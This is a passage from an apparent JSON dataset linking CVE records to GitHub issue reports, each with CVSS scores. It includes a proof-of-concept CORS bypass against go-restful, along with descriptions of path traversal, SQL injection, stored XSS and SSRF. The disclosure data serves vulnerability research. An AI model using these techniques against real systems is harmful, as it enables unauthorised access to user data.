systemd service that disables userdata access. If an external tool is necessary, we could ship it or recommend adding it to the OS. Or we could recommend that APITAG check the platform ID and disable userdata access themselves. However, we generally try to keep Ignition secure by default. I think it would make sense to delete userdata automatically wherever we have an API to do so. This is most important for platforms that can't be remediated by firewalling, but is still a worthwhile improvement on the others. On platforms where we can't delete userdata, we could log a warning recommending that users firewall or otherwise mitigate their risk. In principle this would be a compatibility break, since it's possible for other software in the instance (or on a VM host) to intentionally access userdata. APITAG would be hacky, since the userdata must be formatted as an Ignition config for Ignition to care about it, but it's conceivable.) If we're concerned about this, we could add an Ignition config field ( APITAG ?) configuring whether Ignition performs the deletion. I think the default should certainly be true after the next major spec bump, but the short term default is less clear, especially for old specs that don't have the field. We'd need to delete userdata after Ignition completes, not after fetch succeeds. There are two reasons: kargs changes may reboot the machine and refetch userdata, and a failed Ignition run may be retried by the OS (since Ignition is mostly idempotent). Platform notes AWS Network metadata service. Userdata can be changed with the APITAG control plane request, but there's no instance side API. Control plane access is probably out of scope for us. Azure On FCOS and RHCOS, Azure userdata access is already disabled at runtime, outside Ignition's control. Azure doesn't allow full access to a VM until it \"checks in\" to report that it has provisioned successfully, and this checkin causes Azure to disable access to the config drive. Checkin is handled by Afterburn, which runs in the initramfs on RHCOS (to avoid long delays for console access) and in the real root on FCOS (for eventual integration with automatic rollback: URLTAG It may or may not make sense to move this into Ignition. APITAG Network metadata service does not appear to support changing userdata. GCP Network metadata service with support for deleting userdata. Some discussion in URLTAG Packet Network metadata service does not appear to support changing userdata. qemu fw_cfg userdata is only accessible by root. Write support was removed in URLTAG We also support config drives on non NUMBERTAG APITAG Guest properties can be modified from inside the guest. They're FILETAG as being accessible only to root, but it still seems useful to remove userdata. APITAG Userdata is accessible by non root users. It can be stored directly in guestinfo or in an XML document in guestinfo, and we'd have to handle both cases. See NUMBERTAG",
  78542. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  78543. "severity": "MEDIUM",
  78544. "baseScore": 6.5,
  78545. "impactScore": 3.6,
  78546. "exploitabilityScore": 2.8
  78547. },
  78548. {
  78549. "CVE_ID": "CVE-2022-1707",
  78550. "Issue_Url_old": "https://github.com/duracelltomi/gtm4wp/issues/224",
  78551. "Issue_Url_new": "https://github.com/duracelltomi/gtm4wp/issues/224",
  78552. "Repo_new": "duracelltomi/gtm4wp",
  78553. "Issue_Created_At": "2022-05-09T20:42:33Z",
  78554. "description": "No security policy. Hi MENTIONTAG Do you have a private email or contact information for security disclosures? If so, can you add that to your security policy on APITAG Cheers!",
  78555. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  78556. "severity": "MEDIUM",
  78557. "baseScore": 6.1,
  78558. "impactScore": 2.7,
  78559. "exploitabilityScore": 2.8
  78560. },
  78561. {
  78562. "CVE_ID": "CVE-2022-1993",
  78563. "Issue_Url_old": "https://github.com/gogs/gogs/issues/7002",
  78564. "Issue_Url_new": "https://github.com/gogs/gogs/issues/7002",
  78565. "Repo_new": "gogs/gogs",
  78566. "Issue_Created_At": "2022-06-03T13:53:58Z",
  78567. "description": "Path Traversal in Git HTTP endpoints. Describe the bug The report on huntr.dev URLTAG Code of Conduct [X] I agree to follow this project's Code of Conduct",
  78568. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  78569. "severity": "HIGH",
  78570. "baseScore": 8.1,
  78571. "impactScore": 5.2,
  78572. "exploitabilityScore": 2.8
  78573. },
  78574. {
  78575. "CVE_ID": "CVE-2022-1996",
  78576. "Issue_Url_old": "https://github.com/emicklei/go-restful/issues/489",
  78577. "Issue_Url_new": "https://github.com/emicklei/go-restful/issues/489",
  78578. "Repo_new": "emicklei/go-restful",
  78579. "Issue_Created_At": "2022-03-29T12:40:35Z",
  78580. "description": "security] Authorization Bypass Through User Controlled Key. MENTIONTAG following on from NUMBERTAG and URLTAG we are sharing the details of the report as requested in the APITAG . Authorization Bypass Through User Controlled Key in [emicklei/go restful URLTAG Reported on Mar NUMBERTAG th NUMBERTAG Description Hello go restful maintainer team, I would like to report a security concerning your CORS Filter feature. Go restful allows user to specify a CORS Filter with a configurable APITAG param which is an array of domains allowed in CORS policy. However, although there's is already another param called APITAG used for matching origin using regular expression, all domains in APITAG is also used as regular expression to check for matching origin in this code in file cors_filter.go: if APITAG NUMBERTAG compile allowed domains to allowed origin patterns APITAG err := APITAG if err != nil { return false } APITAG = APITAG } for _, pattern := range APITAG { if allowed = APITAG allowed { break } } So by this, if the user input example.com to be one of domain in APITAG all domains starting with example.com would be acceptable. Proof of Concept Install go restful and create a file main.go with this content: package main import ( restful PATHTAG \"io\" \"net/http\" ) func APITAG { container := APITAG ws := APITAG APITAG APITAG server := APITAG NUMBERTAG Handler: container} APITAG cors := APITAG APITAG ]string{\"X My Header\"}, APITAG APITAG APITAG true, Container: container, } APITAG APITAG } func hello(req APITAG resp APITAG { APITAG \"world\") } In the above code, example.com is configured as an allowed domain. Run the above code and access link /hello with Origin Header = APITAG and see that the request gets through CORS policy and response looks like this: HTTP NUMBERTAG OK Access Control Allow Credentials: true Access Control Allow Origin: APITAG Access Control Expose Headers: X My Header Date: Mon NUMBERTAG Mar NUMBERTAG GMT Content Length NUMBERTAG Content Type: text/plain; charset=utf NUMBERTAG Connection: close world Impact This vulnerability is capable of breaking CORS policy and thus allowing any page to make requests, retrieve data on behalf of other users. Occurrences [cors_filter.go L NUMBERTAG URLTAG",
  78581. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  78582. "severity": "CRITICAL",
  78583. "baseScore": 9.1,
  78584. "impactScore": 5.2,
  78585. "exploitabilityScore": 3.9
  78586. },
  78587. {
  78588. "CVE_ID": "CVE-2022-2063",
  78589. "Issue_Url_old": "https://github.com/nocodb/nocodb/issues/2262",
  78590. "Issue_Url_new": "https://github.com/nocodb/nocodb/issues/2262",
  78591. "Repo_new": "nocodb/nocodb",
  78592. "Issue_Created_At": "2022-06-04T18:38:08Z",
  78593. "description": "Who to contact for security issues. Hello \ud83d\udc4b I run a security community that finds and fixes vulnerabilities in OSS. A researcher ( APITAG has found a potential issue, which I would be eager to share with you. Could you add a APITAG file with an e mail address for me to send further details to? APITAG recommends URLTAG a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future. Looking forward to hearing from you \ud83d\udc4d (cc APITAG helper)",
  78594. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78595. "severity": "HIGH",
  78596. "baseScore": 8.8,
  78597. "impactScore": 5.9,
  78598. "exploitabilityScore": 2.8
  78599. },
  78600. {
  78601. "CVE_ID": "CVE-2022-21221",
  78602. "Issue_Url_old": "https://github.com/valyala/fasthttp/issues/1226",
  78603. "Issue_Url_new": "https://github.com/valyala/fasthttp/issues/1226",
  78604. "Repo_new": "valyala/fasthttp",
  78605. "Issue_Created_At": "2022-02-21T11:25:44Z",
  78606. "description": "Path Traversal Attacks. Hello, I found a problem when requesting path traversal attacks ( URLTAG If you specify a backslash NUMBERTAG c) character in the path, then you can follow the path /../ and get data from the root. It may be worth adding a check for part of the path /..\\. APITAG = []byte(\"/.. ). At your discretion. Thanks.",
  78607. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  78608. "severity": "HIGH",
  78609. "baseScore": 7.5,
  78610. "impactScore": 3.6,
  78611. "exploitabilityScore": 3.9
  78612. },
  78613. {
  78614. "CVE_ID": "CVE-2022-21646",
  78615. "Issue_Url_old": "https://github.com/authzed/spicedb/issues/358",
  78616. "Issue_Url_new": "https://github.com/authzed/spicedb/issues/358",
  78617. "Repo_new": "authzed/spicedb",
  78618. "Issue_Created_At": "2021-12-31T13:51:57Z",
  78619. "description": "unexpected expand/lookup behaviour with wildcard permissions. Reproduction: URLTAG As I run some experiments with the new wildcard permissions feature, I stumbled upon an apparently unexpected behaviour when doing lookup/expand. Permissions that effectively end up in APITAG behave correctly with Check API, but not with APITAG API (which is presumably what's used in the validation tab in the playground). In the original issue, we discussed that APITAG will have special treatment to APITAG relationship when performing APITAG API, which is reasonable because it would lead to \"listing all users\" phenomenon. However, when APITAG is chained with other algebraic operators like APITAG and APITAG , I think the current implementation semantics seem unexpected. The desirable outcome would be: APITAG APITAG",
  78620. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  78621. "severity": "HIGH",
  78622. "baseScore": 8.1,
  78623. "impactScore": 5.2,
  78624. "exploitabilityScore": 2.8
  78625. },
  78626. {
  78627. "CVE_ID": "CVE-2022-21672",
  78628. "Issue_Url_old": "https://github.com/lfs-book/make-ca/issues/19",
  78629. "Issue_Url_new": "https://github.com/lfs-book/make-ca/issues/19",
  78630. "Repo_new": "lfs-book/make-ca",
  78631. "Issue_Created_At": "2022-01-08T15:44:30Z",
  78632. "description": "ca bundle.crt includes distrusted certificates. Reported by Robert Bartel via blfs dev, and it also happens on my system: Just recently I noticed that the PATHTAG generated by make ca NUMBERTAG includes two explicitly distrusted certificates as indicated by their comments: APITAG It seems to me that p NUMBERTAG kit and APITAG can explicitly distrust certificates in their CA stores for various usage purposes while the PEM bundle format (ca APITAG used mainly by APITAG does not support this. So my interpretation is that all applications using the bundles will trust these bad certificates. As make ca uses p NUMBERTAG kit's \"trust extract\" utility to generate the PEM bundles, I looked in trust/extract pem.c of p NUMBERTAG kit NUMBERTAG Here it looks like it iterates over all certificates in the CA store and the trust status is only indicated by the generated comment line. But I could be wrong. I'm not wanting to create a APITAG account right now to report the issue to the p NUMBERTAG kit project, so I first ask here if anyone can confirm or reject this? For the time being I resorted to remove the bad certificates by using the following command line: CODETAG Thank you for reading this and keep up the good work!",
  78633. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  78634. "severity": "MEDIUM",
  78635. "baseScore": 6.5,
  78636. "impactScore": 3.6,
  78637. "exploitabilityScore": 2.8
  78638. },
  78639. {
  78640. "CVE_ID": "CVE-2022-21694",
  78641. "Issue_Url_old": "https://github.com/onionshare/onionshare/issues/1389",
  78642. "Issue_Url_new": "https://github.com/onionshare/onionshare/issues/1389",
  78643. "Repo_new": "onionshare/onionshare",
  78644. "Issue_Created_At": "2021-08-15T16:57:30Z",
  78645. "description": "Use nginx as the web service, instead of flask's APITAG Right now when APITAG starts a web service, it uses APITAG to start it directly in flask. I think instead we should launch an nginx subprocess and use that along with gunicorn to host the flask app. We already have an issue to use gunicorn NUMBERTAG instead of flask directly, and this will be much simpler if we use nginx If we use nginx, we can get gzip for free and don't need to gzip everything and fill up APITAG NUMBERTAG and I suspect we could simplify a lot of the web server code in other ways too If we use nginx, we get simple working range requests NUMBERTAG If we use nginx and implement the download accelerator NUMBERTAG we get much better performance, e.g. quicker download speeds Before implementing this, I'm not sure how a few things will work: Progress bars. If someone downloads a file from nginx, how can we hook into the real time file transfer to make progress bars work? APITAG sharing after files have been sent\". How do we know that the files are finished sending?",
  78646. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  78647. "severity": "MEDIUM",
  78648. "baseScore": 5.3,
  78649. "impactScore": 1.4,
  78650. "exploitabilityScore": 3.9
  78651. },
  78652. {
  78653. "CVE_ID": "CVE-2022-21711",
  78654. "Issue_Url_old": "https://github.com/liyansong2018/elfspirit/issues/1",
  78655. "Issue_Url_new": "https://github.com/liyansong2018/elfspirit/issues/1",
  78656. "Repo_new": "liyansong2018/elfspirit",
  78657. "Issue_Created_At": "2022-01-23T12:32:42Z",
  78658. "description": "Out of bounds read in elf parsing.. poc APITAG log ERRORTAG FILETAG",
  78659. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  78660. "severity": "HIGH",
  78661. "baseScore": 7.1,
  78662. "impactScore": 5.2,
  78663. "exploitabilityScore": 1.8
  78664. },
  78665. {
  78666. "CVE_ID": "CVE-2022-2191",
  78667. "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/8161",
  78668. "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/8161",
  78669. "Repo_new": "eclipse/jetty.project",
  78670. "Issue_Created_At": "2022-06-13T13:35:36Z",
  78671. "description": "Improve APITAG buffers handling. Jetty version(s NUMBERTAG Description APITAG 's buffers utilization and their pooling should be reviewed.",
  78672. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  78673. "severity": "HIGH",
  78674. "baseScore": 7.5,
  78675. "impactScore": 3.6,
  78676. "exploitabilityScore": 3.9
  78677. },
  78678. {
  78679. "CVE_ID": "CVE-2022-22123",
  78680. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1557",
  78681. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1557",
  78682. "Repo_new": "halo-dev/halo",
  78683. "Issue_Created_At": "2021-12-02T14:09:30Z",
  78684. "description": "\u5904\u7406\u540e\u53f0\u5404\u4e2a\u8f93\u5165\u6846\u7684 XSS \u5b89\u5168\u95ee\u9898. What is version of Halo has the issue NUMBERTAG What database are you using? H2 What is your deployment method? Fat Jar Your site address. _No response_ What happened? APITAG APITAG APITAG Relevant log output _No response_ Additional information _No response_",
  78685. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  78686. "severity": "MEDIUM",
  78687. "baseScore": 5.4,
  78688. "impactScore": 2.7,
  78689. "exploitabilityScore": 2.3
  78690. },
  78691. {
  78692. "CVE_ID": "CVE-2022-22124",
  78693. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1575",
  78694. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1575",
  78695. "Repo_new": "halo-dev/halo",
  78696. "Issue_Created_At": "2021-12-06T12:01:50Z",
  78697. "description": "\u4e0a\u4f20 SVG \u56fe\u7247\u53ef\u80fd\u5f15\u53d1\u7684 XSS NUMBERTAG H2 \u4f7f\u7528\u7684\u54ea\u79cd\u65b9\u5f0f\u90e8\u7f72\uff1f Fat Jar \u5728\u7ebf\u7ad9\u70b9\u5730\u5740 _No response_ \u53d1\u751f\u4e86\u4ec0\u4e48\uff1f SVG \u6587\u4ef6\u5305\u542b JS \u811a\u672c\u53ef\u80fd\u4f1a\u5f15\u53d1\u7684 XSS APITAG SVG \u6587\u4ef6\u793a\u4f8b\uff1a CODETAG \u76f8\u5173\u65e5\u5fd7\u8f93\u51fa _No response_ \u9644\u52a0\u4fe1\u606f _No response_",
  78698. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  78699. "severity": "MEDIUM",
  78700. "baseScore": 5.4,
  78701. "impactScore": 2.7,
  78702. "exploitabilityScore": 2.3
  78703. },
  78704. {
  78705. "CVE_ID": "CVE-2022-22293",
  78706. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/20237",
  78707. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/20237",
  78708. "Repo_new": "dolibarr/dolibarr",
  78709. "Issue_Created_At": "2022-03-01T13:37:10Z",
  78710. "description": "HTML injection in FILETAG , Dolibarr NUMBERTAG Bug There is a proof of concept for a XSS on FILETAG for Dolibarr NUMBERTAG see URLTAG It would be useful to have a check/ statement if the problem still exist in newer versions, or it is already fixed (and if so, in which version). Environment Version NUMBERTAG Environment OS _No response_ Environment Web server _No response_ Environment PHP _No response_ Environment Database _No response_ Environment URL(s) _No response_ Expected and actual behavior _No response_ Steps to reproduce the behavior _No response_ Attached files _No response_",
  78711. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  78712. "severity": "MEDIUM",
  78713. "baseScore": 5.4,
  78714. "impactScore": 2.7,
  78715. "exploitabilityScore": 2.3
  78716. },
  78717. {
  78718. "CVE_ID": "CVE-2022-22701",
  78719. "Issue_Url_old": "https://github.com/partkeepr/PartKeepr/issues/1229",
  78720. "Issue_Url_new": "https://github.com/partkeepr/partkeepr/issues/1229",
  78721. "Repo_new": "partkeepr/partkeepr",
  78722. "Issue_Created_At": "2022-01-04T13:52:52Z",
  78723. "description": "The functionality add attachment to parts allows access to local files.. FILETAG FILETAG System Information APITAG Version NUMBERTAG and NUMBERTAG Operating System: Linux Web Server: Apache PHP Version NUMBERTAG Database and version: Mysql Reproducible on the demo system: Yes.",
  78724. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  78725. "severity": "MEDIUM",
  78726. "baseScore": 6.5,
  78727. "impactScore": 3.6,
  78728. "exploitabilityScore": 2.8
  78729. },
  78730. {
  78731. "CVE_ID": "CVE-2022-22702",
  78732. "Issue_Url_old": "https://github.com/partkeepr/PartKeepr/issues/1230",
  78733. "Issue_Url_new": "https://github.com/partkeepr/partkeepr/issues/1230",
  78734. "Repo_new": "partkeepr/partkeepr",
  78735. "Issue_Created_At": "2022-01-04T14:31:21Z",
  78736. "description": "The functionality add attachment to parts allows access to local ports (SSRF).. FILETAG FILETAG FILETAG System Information APITAG Version NUMBERTAG and NUMBERTAG Operating System: Linux Web Server: Apache PHP Version NUMBERTAG Database and version: Mysql Reproducible on the demo system: Yes.",
  78737. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  78738. "severity": "MEDIUM",
  78739. "baseScore": 4.3,
  78740. "impactScore": 1.4,
  78741. "exploitabilityScore": 2.8
  78742. },
  78743. {
  78744. "CVE_ID": "CVE-2022-22846",
  78745. "Issue_Url_old": "https://github.com/paulc/dnslib/issues/30",
  78746. "Issue_Url_new": "https://github.com/paulc/dnslib/issues/30",
  78747. "Repo_new": "paulc/dnslib",
  78748. "Issue_Created_At": "2022-01-08T15:35:02Z",
  78749. "description": "Client does not validate DNS transaction id. Hi, dnslib client does not validate DNS transaction id (TXID) as specified in the FILETAG . Attackers can use this to redirect users to their malicious name servers. I know the client created for testing but other projects using dnslib as a dependency might be affected as well. I suggest to add a simple validate: ERRORTAG",
  78750. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  78751. "severity": "MEDIUM",
  78752. "baseScore": 5.3,
  78753. "impactScore": 1.4,
  78754. "exploitabilityScore": 3.9
  78755. },
  78756. {
  78757. "CVE_ID": "CVE-2022-22868",
  78758. "Issue_Url_old": "https://github.com/GibbonEdu/core/issues/1594",
  78759. "Issue_Url_new": "https://github.com/gibbonedu/core/issues/1594",
  78760. "Repo_new": "gibbonedu/core",
  78761. "Issue_Created_At": "2022-01-03T03:47:42Z",
  78762. "description": "A Stored Cross Site Scripting (XSS) injection vulnerability exists in Gibbon CMS version APITAG APITAG + VULNERABLE A Stored Cross Site Scripting (XSS) injection vulnerability exists in Gibbon CMS version APITAG . An attacker can inject arbitrary javascripts in PATHTAG APITAG via the \u2018name\u2019 parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Email: EMAILTAG + Product: Gibbon CMS + Version: APITAG + Browser Chrome Describe the bug + The vulnerability is present in the PATHTAG APITAG and can be exploited throuth a POST request via the \u2018name\u2019 parameters. Because of lacking of sanitizer of input data in param name allow inject code javascripts FILETAG FILETAG APITAG Impact + An attacker can send javascripts code through any vulnerable form field to change the design of the website or any information displayed to the user, saving the information persistently on the site (e.g. database). Suggestions + User input should be HTML encoded at any point where it is copied into application responses. All HTML metacharacters, including < > \" ' and =, should be replaced with the corresponding HTML entities (< > etc). To Reproduce APITAG NUMBERTAG After login account admin , you can see admin panel, click timetable admin FILETAG NUMBERTAG You can create a new on record and injection code javascripts into field name as show below FILETAG FILETAG NUMBERTAG As can be seen from the following evidence, the content of the injection was correctly saved on the page (on the database) and executed. FILETAG Screenshots Request: FILETAG Response: FILETAG APITAG",
  78763. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  78764. "severity": "MEDIUM",
  78765. "baseScore": 4.8,
  78766. "impactScore": 2.7,
  78767. "exploitabilityScore": 1.7
  78768. },
  78769. {
  78770. "CVE_ID": "CVE-2022-22880",
  78771. "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3347",
  78772. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3347",
  78773. "Repo_new": "jeecgboot/jeecg-boot",
  78774. "Issue_Created_At": "2022-01-04T06:28:26Z",
  78775. "description": "SQL injection exists in PATHTAG NUMBERTAG After testing, it is found that the code parameter of PATHTAG interface of jeecg boot has SQL injection \u622a\u56fe&\u4ee3\u7801\uff1a PATHTAG FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG FILETAG FILETAG \u53cb\u60c5\u63d0\u793a\uff08\u4e3a\u4e86\u63d0\u9ad8issue\u5904\u7406\u6548\u7387\uff09\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389; \u8bf7\u81ea\u5df1\u521d\u5224\u95ee\u9898\u63cf\u8ff0\u662f\u5426\u6e05\u695a\uff0c\u662f\u5426\u65b9\u4fbf\u6211\u4eec\u8c03\u67e5\u5904\u7406\uff1b APITAG \u63cf\u8ff0\u8fc7\u4e8e\u7b80\u5355\u6216\u6a21\u7cca\uff0c\u5bfc\u81f4\u65e0\u6cd5\u5904\u7406\u7684\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389\uff1b",
  78776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78777. "severity": "CRITICAL",
  78778. "baseScore": 9.8,
  78779. "impactScore": 5.9,
  78780. "exploitabilityScore": 3.9
  78781. },
  78782. {
  78783. "CVE_ID": "CVE-2022-22881",
  78784. "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3348",
  78785. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3348",
  78786. "Repo_new": "jeecgboot/jeecg-boot",
  78787. "Issue_Created_At": "2022-01-04T08:36:23Z",
  78788. "description": "SQL injection exists in PATHTAG \u7248\u672c\u53f7\uff1a jeecg boot NUMBERTAG After testing, it is found that the code parameter of PATHTAG interface of jeecg boot has SQL injection Reuse URLTAG After the source code of the project starts the project, click \"custom component\" and grab the package to get the interface with SQL injection, and use sqlmap to prove the existence of SQL injection \u622a\u56fe&\u4ee3\u7801\uff1a payload: PATHTAG FILETAG or PATHTAG FILETAG Using sqlmap FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG FILETAG FILETAG \u53cb\u60c5\u63d0\u793a\uff08\u4e3a\u4e86\u63d0\u9ad8issue\u5904\u7406\u6548\u7387\uff09\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389; \u8bf7\u81ea\u5df1\u521d\u5224\u95ee\u9898\u63cf\u8ff0\u662f\u5426\u6e05\u695a\uff0c\u662f\u5426\u65b9\u4fbf\u6211\u4eec\u8c03\u67e5\u5904\u7406\uff1b APITAG \u63cf\u8ff0\u8fc7\u4e8e\u7b80\u5355\u6216\u6a21\u7cca\uff0c\u5bfc\u81f4\u65e0\u6cd5\u5904\u7406\u7684\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389\uff1b",
  78789. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78790. "severity": "CRITICAL",
  78791. "baseScore": 9.8,
  78792. "impactScore": 5.9,
  78793. "exploitabilityScore": 3.9
  78794. },
  78795. {
  78796. "CVE_ID": "CVE-2022-22885",
  78797. "Issue_Url_old": "https://github.com/dromara/hutool/issues/2042",
  78798. "Issue_Url_new": "https://github.com/dromara/hutool/issues/2042",
  78799. "Repo_new": "dromara/hutool",
  78800. "Issue_Created_At": "2021-12-26T12:41:33Z",
  78801. "description": "\u9ed8\u8ba4\u7684 APITAG \u4e3a\u4ec0\u4e48\u9009\u62e9 APITAG \u5462\uff1f. \u7248\u672c\u60c5\u51b5 JDK\u7248\u672c\uff1a corretto NUMBERTAG hutool NUMBERTAG hutool APITAG \u4e2d APITAG APITAG \u9ed8\u8ba4\u4f20\u5165\u7684 APITAG \u662f APITAG CODETAG \u67e5\u770b APITAG \u4ee3\u7801\u5982\u4e0b\uff1a CODETAG \u4ece doc \u770b\u5230 APITAG \u662f\u4e00\u79cd fallback \u673a\u5236\uff0c\u5f53\u8981\u8fde\u63a5\u7684 host \u4e0e\u670d\u52a1\u7aef\u8bc1\u4e66 server name \u4e0d\u5339\u914d\u65f6\u624d\u6709\u4f5c\u7528\u3002\u5e76\u4e14 APITAG \u7684\u9ed8\u8ba4\u673a\u5236\u662f\u8fd9\u65f6\u5019\u62d2\u7edd\u6b64\u7c7b\u8bf7\u6c42\u3002\u800c hutool \u5219\u9ed8\u8ba4\u653e\u884c\u6240\u6709\u8fd9\u7c7b\u8bf7\u6c42\u3002 \u5982\u679c\u8c03\u7528 APITAG \u65f6\u624b\u52a8\u4f20\u5165\u4e0a\u9762\u7684 APITAG CODETAG \u4e5f\u4f1a\u8bf7\u6c42\u6210\u529f\u3002\u6309\u6211\u7406\u89e3\u8fd9\u6837\u624d\u662f\u5408\u7406\u7684\uff0c\u5982\u679c\u670d\u52a1\u7aef\u8bc1\u4e66 server name \u4e0e host APITAG APITAG \u7684\u9ed8\u8ba4\u884c\u4e3a\u4f1a\u6709\u5751\uff0chutool \u624d\u53e6\u5916\u6307\u5b9a\u4e86 APITAG \u5462\uff1f \u8c22\u8c22\u3002",
  78802. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78803. "severity": "CRITICAL",
  78804. "baseScore": 9.8,
  78805. "impactScore": 5.9,
  78806. "exploitabilityScore": 3.9
  78807. },
  78808. {
  78809. "CVE_ID": "CVE-2022-22888",
  78810. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4848",
  78811. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4848",
  78812. "Repo_new": "jerryscript-project/jerryscript",
  78813. "Issue_Created_At": "2021-12-07T10:36:37Z",
  78814. "description": "Stack overflow in ecma objects (ecma_op_object_find_own). APITAG revision NUMBERTAG URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Execution steps & Output ERRORTAG",
  78815. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78816. "severity": "HIGH",
  78817. "baseScore": 7.8,
  78818. "impactScore": 5.9,
  78819. "exploitabilityScore": 1.8
  78820. },
  78821. {
  78822. "CVE_ID": "CVE-2022-22890",
  78823. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4847",
  78824. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4847",
  78825. "Repo_new": "jerryscript-project/jerryscript",
  78826. "Issue_Created_At": "2021-12-07T08:52:59Z",
  78827. "description": "Assertion 'arguments_type != SCANNER_ARGUMENTS_PRESENT && arguments_type != APITAG in js scanner util (scanner_pop_literal_pool). APITAG revision NUMBERTAG URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Execution steps & Output ERRORTAG",
  78828. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78829. "severity": "MEDIUM",
  78830. "baseScore": 5.5,
  78831. "impactScore": 3.6,
  78832. "exploitabilityScore": 1.8
  78833. },
  78834. {
  78835. "CVE_ID": "CVE-2022-22891",
  78836. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4871",
  78837. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4871",
  78838. "Repo_new": "jerryscript-project/jerryscript",
  78839. "Issue_Created_At": "2021-12-09T07:38:01Z",
  78840. "description": "SEGV in ecma_ref_object_inline of ecma gc.c. APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  78841. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78842. "severity": "MEDIUM",
  78843. "baseScore": 5.5,
  78844. "impactScore": 3.6,
  78845. "exploitabilityScore": 1.8
  78846. },
  78847. {
  78848. "CVE_ID": "CVE-2022-22892",
  78849. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4872",
  78850. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4872",
  78851. "Repo_new": "jerryscript-project/jerryscript",
  78852. "Issue_Created_At": "2021-12-09T07:41:05Z",
